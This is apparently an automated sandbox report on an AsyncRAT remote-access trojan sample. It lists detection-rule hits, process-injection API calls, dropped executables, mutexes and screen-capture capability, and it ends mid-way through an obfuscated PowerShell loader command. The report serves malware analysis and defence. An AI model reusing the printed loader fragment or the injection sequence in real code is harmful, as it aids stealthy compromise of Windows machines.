                      Source: svchost.exe, 00000023.00000000.1891920360.0000020D262D3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.3022802035.0000020D265BD000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893559438.0000020D265BD000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893472173.0000020D26583000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893764769.0000020D26643000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comSRD13
                      Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.16.drString found in binary or memory: https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yq
                      Source: svchost.exe, 00000023.00000000.1892174406.0000020D262F8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.3013226921.0000020D262F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
                      Source: svchost.exe, 00000023.00000000.1891920360.0000020D262D3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.3021733036.0000020D26583000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893472173.0000020D26583000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.3020897864.0000020D2655D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.3011954167.0000020D262D3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893764769.0000020D26643000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893396897.0000020D2655D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comSRD1#

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: 2.2.x4host.exe.1bd60000.0.raw.unpack, RemoteDesktop.cs.Net Code: GetScreen

                      Operating System Destruction

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: 01 00 00 00 Jump to behavior

                      System Summary

                      barindex
                      Source: 0.2.x433.exe.29b77d8.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 2.0.x4host.exe.fb0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 0.2.x433.exe.29b77d8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000000.00000002.1709422465.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000002.00000000.1707631721.0000000000FB2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\x4usb.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: unknownProcess created: Commandline size = 5205
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B87E0F2 NtWriteVirtualMemory,3_2_00007FFD9B87E0F2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B87E112 NtSetContextThread,3_2_00007FFD9B87E112
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B87E132 NtResumeThread,3_2_00007FFD9B87E132
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B87E0D2 NtUnmapViewOfSection,3_2_00007FFD9B87E0D2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B880FF4 NtResumeThread,3_2_00007FFD9B880FF4
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B880F30 NtSetContextThread,3_2_00007FFD9B880F30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B880A4E NtUnmapViewOfSection,3_2_00007FFD9B880A4E
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B87E122 NtSetContextThread,3_2_00007FFD9B87E122
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B880C6D NtWriteVirtualMemory,3_2_00007FFD9B880C6D
                      Source: C:\Windows\System32\dllhost.exeCode function: 5_2_0000000140001868 OpenProcess,IsWow64Process,FindCloseChangeNotification,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,FindCloseChangeNotification,CloseHandle,5_2_0000000140001868
                      Source: C:\Windows\System32\winlogon.exeCode function: 6_2_00000225DC642964 NtEnumerateValueKey,NtEnumerateValueKey,6_2_00000225DC642964
                      Source: C:\Windows\System32\lsass.exeCode function: 7_2_00000202C0AE25CC NtQueryDirectoryFileEx,GetFileType,StrCpyW,7_2_00000202C0AE25CC
                      Source: C:\Windows\System32\lsass.exeCode function: 7_2_00000202C0AE20E4 NtQuerySystemInformation,StrCmpNIW,7_2_00000202C0AE20E4
                      Source: C:\Windows\System32\dwm.exeCode function: 9_2_000002BAAE262964 NtEnumerateValueKey,NtEnumerateValueKey,9_2_000002BAAE262964
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_p0mqc12a.0ea.ps1Jump to behavior
                      Source: C:\Users\user\Desktop\x433.exeCode function: 0_2_00007FFD9B890B950_2_00007FFD9B890B95
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_0042BDF61_2_0042BDF6
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_007A00D91_2_007A00D9
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_007A515C1_2_007A515C
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_007651EE1_2_007651EE
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_007A39A31_2_007A39A3
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_00766EAF1_2_00766EAF
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_007959801_2_00795980
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_00767B711_2_00767B71
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_0079D5801_2_0079D580
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_0079C7F01_2_0079C7F0
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_00767F801_2_00767F80
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_007937801_2_00793780
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeCode function: 2_2_00007FFD9B886BF22_2_00007FFD9B886BF2
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeCode function: 2_2_00007FFD9B8816D92_2_00007FFD9B8816D9
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeCode function: 2_2_00007FFD9B885E462_2_00007FFD9B885E46
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeCode function: 2_2_00007FFD9B8821112_2_00007FFD9B882111
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeCode function: 2_2_00007FFD9B88D88A2_2_00007FFD9B88D88A
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeCode function: 2_2_00007FFD9B889A202_2_00007FFD9B889A20
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeCode function: 2_2_00007FFD9B88BE282_2_00007FFD9B88BE28
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B87DD683_2_00007FFD9B87DD68
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B87E3393_2_00007FFD9B87E339
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BB134493_2_00007FFD9BB13449
                      Source: C:\Windows\System32\dllhost.exeCode function: 5_3_000002D8B0A441F85_3_000002D8B0A441F8
                      Source: C:\Windows\System32\dllhost.exeCode function: 5_3_000002D8B0A3DA305_3_000002D8B0A3DA30
                      Source: C:\Windows\System32\dllhost.exeCode function: 5_3_000002D8B0A31FC85_3_000002D8B0A31FC8
                      Source: C:\Windows\System32\dllhost.exeCode function: 5_2_0000000140001CF05_2_0000000140001CF0
                      Source: C:\Windows\System32\dllhost.exeCode function: 5_2_0000000140002D4C5_2_0000000140002D4C
                      Source: C:\Windows\System32\dllhost.exeCode function: 5_2_00000001400024345_2_0000000140002434
                      Source: C:\Windows\System32\dllhost.exeCode function: 5_2_00000001400031D05_2_00000001400031D0
                      Source: C:\Windows\System32\dllhost.exeCode function: 5_2_00000001400012745_2_0000000140001274
                      Source: C:\Windows\System32\dllhost.exeCode function: 5_2_000002D8B0A74DF85_2_000002D8B0A74DF8
                      Source: C:\Windows\System32\dllhost.exeCode function: 5_2_000002D8B0A6E6305_2_000002D8B0A6E630
                      Source: C:\Windows\System32\dllhost.exeCode function: 5_2_000002D8B0A62BC85_2_000002D8B0A62BC8
                      Source: C:\Windows\System32\winlogon.exeCode function: 6_3_00000225DC6241F86_3_00000225DC6241F8
                      Source: C:\Windows\System32\winlogon.exeCode function: 6_3_00000225DC61DA306_3_00000225DC61DA30
                      Source: C:\Windows\System32\winlogon.exeCode function: 6_3_00000225DC611FC86_3_00000225DC611FC8
                      Source: C:\Windows\System32\winlogon.exeCode function: 6_2_00000225DC654DF86_2_00000225DC654DF8
                      Source: C:\Windows\System32\winlogon.exeCode function: 6_2_00000225DC64E6306_2_00000225DC64E630
                      Source: C:\Windows\System32\winlogon.exeCode function: 6_2_00000225DC642BC86_2_00000225DC642BC8
                      Source: C:\Windows\System32\lsass.exeCode function: 7_3_00000202C0AC41F87_3_00000202C0AC41F8
                      Source: C:\Windows\System32\lsass.exeCode function: 7_3_00000202C0ABDA307_3_00000202C0ABDA30
                      Source: C:\Windows\System32\lsass.exeCode function: 7_3_00000202C0AB1FC87_3_00000202C0AB1FC8
                      Source: C:\Windows\System32\lsass.exeCode function: 7_2_00000202C0AF4DF87_2_00000202C0AF4DF8
                      Source: C:\Windows\System32\lsass.exeCode function: 7_2_00000202C0AEE6307_2_00000202C0AEE630
                      Source: C:\Windows\System32\lsass.exeCode function: 7_2_00000202C0AE2BC87_2_00000202C0AE2BC8
                      Source: C:\Windows\System32\svchost.exeCode function: 8_3_000002A6612D1FC88_3_000002A6612D1FC8
                      Source: C:\Windows\System32\svchost.exeCode function: 8_3_000002A6612E41F88_3_000002A6612E41F8
                      Source: C:\Windows\System32\svchost.exeCode function: 8_3_000002A6612DDA308_3_000002A6612DDA30
                      Source: C:\Windows\System32\svchost.exeCode function: 8_2_000002A661302BC88_2_000002A661302BC8
                      Source: C:\Windows\System32\svchost.exeCode function: 8_2_000002A661314DF88_2_000002A661314DF8
                      Source: C:\Windows\System32\svchost.exeCode function: 8_2_000002A66130E6308_2_000002A66130E630
                      Source: C:\Windows\System32\dwm.exeCode function: 9_3_000002BAAE2441F89_3_000002BAAE2441F8
                      Source: C:\Windows\System32\dwm.exeCode function: 9_3_000002BAAE23DA309_3_000002BAAE23DA30
                      Source: C:\Windows\System32\dwm.exeCode function: 9_3_000002BAAE231FC89_3_000002BAAE231FC8
                      Source: C:\Windows\System32\dwm.exeCode function: 9_2_000002BAAE274DF89_2_000002BAAE274DF8
                      Source: C:\Windows\System32\dwm.exeCode function: 9_2_000002BAAE26E6309_2_000002BAAE26E630
                      Source: C:\Windows\System32\dwm.exeCode function: 9_2_000002BAAE262BC89_2_000002BAAE262BC8
                      Source: C:\Windows\System32\svchost.exeCode function: 10_3_0000026A8799DA3010_3_0000026A8799DA30
                      Source: C:\Windows\System32\svchost.exeCode function: 10_3_0000026A879A41F810_3_0000026A879A41F8
                      Source: C:\Windows\System32\svchost.exeCode function: 10_3_0000026A87991FC810_3_0000026A87991FC8
                      Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000026A879C2BC810_2_0000026A879C2BC8
                      Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000026A879CE63010_2_0000026A879CE630
                      Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000026A879D4DF810_2_0000026A879D4DF8
                      Source: C:\Windows\System32\svchost.exeCode function: 11_3_000001795377DA3011_3_000001795377DA30
                      Source: C:\Windows\System32\svchost.exeCode function: 11_3_00000179537841F811_3_00000179537841F8
                      Source: C:\Windows\System32\svchost.exeCode function: 11_3_0000017953771FC811_3_0000017953771FC8
                      Source: C:\Windows\System32\svchost.exeCode function: 11_2_00000179537AE63011_2_00000179537AE630
                      Source: C:\Windows\System32\svchost.exeCode function: 11_2_00000179537B4DF811_2_00000179537B4DF8
                      Source: C:\Windows\System32\svchost.exeCode function: 11_2_00000179537A2BC811_2_00000179537A2BC8
                      Source: x4Shellcode.exe.0.drStatic PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Source: x433.exe, 00000000.00000002.1709422465.0000000002991000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamex4host.exe4 vs x433.exe
                      Source: x433.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 0.2.x433.exe.29b77d8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 2.0.x4host.exe.fb0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 0.2.x433.exe.29b77d8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000000.00000002.1709422465.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000002.00000000.1707631721.0000000000FB2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: C:\Users\user\AppData\Local\x4usb.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: x4Shellcode.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: x4Shellcode.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: x433.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: x4host.exe.0.dr, etNX0TntxxQcULpBdpvLQMPzQQj7vk.csCryptographic APIs: 'TransformFinalBlock'
                      Source: x4host.exe.0.dr, etNX0TntxxQcULpBdpvLQMPzQQj7vk.csCryptographic APIs: 'TransformFinalBlock'
                      Source: x4host.exe.0.dr, EnDrnZVI21QanoXDv7V6tpRAyEeGc3.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.x433.exe.29b77d8.1.raw.unpack, etNX0TntxxQcULpBdpvLQMPzQQj7vk.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.x433.exe.29b77d8.1.raw.unpack, etNX0TntxxQcULpBdpvLQMPzQQj7vk.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.x433.exe.29b77d8.1.raw.unpack, EnDrnZVI21QanoXDv7V6tpRAyEeGc3.csCryptographic APIs: 'TransformFinalBlock'
                      Source: x4usb.exe.2.dr, etNX0TntxxQcULpBdpvLQMPzQQj7vk.csCryptographic APIs: 'TransformFinalBlock'
                      Source: x4usb.exe.2.dr, etNX0TntxxQcULpBdpvLQMPzQQj7vk.csCryptographic APIs: 'TransformFinalBlock'
                      Source: x4usb.exe.2.dr, EnDrnZVI21QanoXDv7V6tpRAyEeGc3.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 2.2.x4host.exe.1bd60000.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 2.2.x4host.exe.1bd60000.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: x4host.exe.0.dr, ep6wttCf2TiLTQ7SU0ji7DL4Gw31u1.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: x4host.exe.0.dr, ep6wttCf2TiLTQ7SU0ji7DL4Gw31u1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: x4usb.exe.2.dr, ep6wttCf2TiLTQ7SU0ji7DL4Gw31u1.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: x4usb.exe.2.dr, ep6wttCf2TiLTQ7SU0ji7DL4Gw31u1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: x433.exe, Program.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: x433.exe, Program.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.x433.exe.29b77d8.1.raw.unpack, ep6wttCf2TiLTQ7SU0ji7DL4Gw31u1.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 0.2.x433.exe.29b77d8.1.raw.unpack, ep6wttCf2TiLTQ7SU0ji7DL4Gw31u1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: Security.evtx.16.drBinary string: \Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys\Ke
                      Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.16.drBinary string: J\Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
                      Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.16.drBinary string: 9\Device\HarddiskVolume3\Windows\System32\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeZX**
                      Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.16.drBinary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exez
                      Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.16.drBinary string: A\Device\HarddiskVolume3\Program Files\Mozilla Firefox\firefox.exe
                      Source: Security.evtx.16.drBinary string: \Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
                      Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.16.drBinary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exep
                      Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.16.drBinary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                      Source: Microsoft-Windows-SMBServer%4Operational.evtx.16.drBinary string: DESKTOP-AGET0TR WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
                      Source: Microsoft-Windows-SMBServer%4Operational.evtx.16.drBinary string: user-PC WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
                      Source: System.evtx.16.drBinary string: \Device\HarddiskVolume3\Windows\SysWOW64\tzutil.exe
                      Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.16.drBinary string: >\Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys
                      Source: System.evtx.16.drBinary string: \Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exed
                      Source: Microsoft-Windows-SMBServer%4Operational.evtx.16.drBinary string: \Device\NetbiosSmb
                      Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.16.drBinary string: 9\Device\HarddiskVolume3\Windows\System32\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
                      Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.16.drBinary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exec
                      Source: System.evtx.16.drBinary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4
                      Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.16.drBinary string: T\Device\HarddiskVolume3\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      Source: System.evtx.16.drBinary string: C:\Device\HarddiskVolume3`
                      Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.16.drBinary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeW
                      Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.16.drBinary string: 1\Device\HarddiskVolume3\Windows\SysWOW64\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
                      Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.16.drBinary string: 4\Device\HarddiskVolume3\Windows\System32\spoolsv.exe
                      Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.16.drBinary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeV
                      Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.16.drBinary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeU
                      Source: Microsoft-Windows-SmbClient%4Connectivity.evtx.16.drBinary string: :\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
                      Source: Microsoft-Windows-SMBServer%4Operational.evtx.16.drBinary string: WIN-77KHDDR6TT1 WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
                      Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.16.drBinary string: K\Device\HarddiskVolume3\Users\user\AppData\Local\Temp\JSAMSIProvider64.dll6\Device\HarddiskVolume3\Windows\System32\SIHClient.exe
                      Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.16.drBinary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}l
                      Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.16.drBinary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
                      Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.16.drBinary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeN
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/70@2/4
                      Source: C:\Windows\System32\dllhost.exeCode function: 5_2_0000000140002D4C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx,5_2_0000000140002D4C
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_0040151A SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,SysFreeString,SysFreeString,SysFreeString,1_2_0040151A
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_004017A5 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW,1_2_004017A5
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_0078CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,1_2_0078CBD0
                      Source: C:\Users\user\Desktop\x433.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\x433.exe.logJump to behavior
                      Source: C:\Users\user\AppData\Local\x4usb.exeMutant created: NULL
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-141973e4e5834a36-inf
                      Source: C:\Users\user\Desktop\x433.exeMutant created: \Sessions\1\BaseNamedObjects\St48A49HT4eAEQEuH
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6988:120:WilError_03
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-141973e4e5834a367d8e3ee9-b
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeMutant created: \Sessions\1\BaseNamedObjects\W30TmOEkpxCork0C
                      Source: C:\Users\user\Desktop\x433.exeFile created: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeJump to behavior
                      Source: x433.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: x433.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\x433.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: x433.exeReversingLabs: Detection: 76%
                      Source: unknownProcess created: C:\Users\user\Desktop\x433.exe "C:\Users\user\Desktop\x433.exe"
                      Source: C:\Users\user\Desktop\x433.exeProcess created: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe "C:\Users\user\AppData\Local\Temp\x4Shellcode.exe"
                      Source: C:\Users\user\Desktop\x433.exeProcess created: C:\Users\user\AppData\Local\Temp\x4host.exe "C:\Users\user\AppData\Local\Temp\x4host.exe"
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:rLleiAFHAZAE{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OsygfxRUYuIQnc,[Parameter(Position=1)][Type]$MbVaDjEwaI)$reLCkliZwnS=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object 